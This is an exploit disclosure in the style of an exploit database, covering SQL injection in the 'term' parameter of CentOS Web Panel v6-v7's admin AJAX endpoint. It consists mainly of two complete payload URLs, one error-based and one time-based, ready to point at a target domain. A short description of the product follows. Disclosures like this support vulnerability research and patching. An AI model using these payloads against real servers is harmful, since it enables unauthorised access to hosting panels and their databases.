Share
# Exploit Title: Centos WebPanel 7 - 'term' SQL Injection  
# Google Dork: N/A  
# Date: 2020-03-03  
# Exploit Author: Berke YILMAZ  
# Vendor Homepage: http://centos-webpanel.com/  
# Software Link: http://centos-webpanel.com/  
# Version: v6 - v7  
# Tested on: Kali Linux - Windows 10  
# CVE : N/A  
  
# Type: Error Based SQL Injection  
# Payload:  
https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a'  
AND (SELECT 1197 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT  
(ELT(1197=1197,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aRuO  
  
  
# Type: Time Based SQL Injection  
# Payload:  
https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a'  
OR SLEEP(5)-- JCpP  
  
Centos-Webpanel (http://centos-webpanel.com/)  
CentOS Web Panel | Free Linux Web Hosting Control Panel  
Free CentOS Linux Web Hosting control panel designed for quick and easy  
management of (Dedicated & VPS) servers without of need to use ssh console  
for every little thing